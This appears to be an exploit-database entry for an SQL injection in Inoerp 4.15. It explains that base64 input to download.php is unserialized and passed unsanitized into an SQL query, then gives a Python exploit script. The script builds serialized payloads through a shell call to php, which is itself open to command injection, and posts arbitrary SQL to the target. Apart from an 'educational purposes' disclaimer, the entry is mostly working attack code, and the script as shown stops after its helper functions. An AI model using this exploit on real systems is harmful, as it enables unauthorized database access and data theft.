Exploits / Vulnerability Discovered : 2019-09-26 |
Type : webapps |
Platform : php
This exploit / vulnerability Inoerp 4.15 download sql injection is for educational purposes only and if it is used you will do on your own risk!
# A malicious query can be sent in base64 encoding to unserialize() function.
# It can be deserialized without any sanitization then.
# After it, it gets passed directly to the SQL query.
#!/bin/python
import os
import base64
import requests
import sys
def generatePayload(query):
#THIS FUNCTION IS INSECURE BY DESIGN
b64_query = base64.b64encode(query);
return os.popen("php -r \"echo base64_encode(serialize(base64_decode('" + b64_query + "')));\"").read()
def ExecSQL(query):
data = {"data":query,
"data_type":"sql_query"}
r = requests.post("http://" + ip + "/download.php", data=data)
return r.content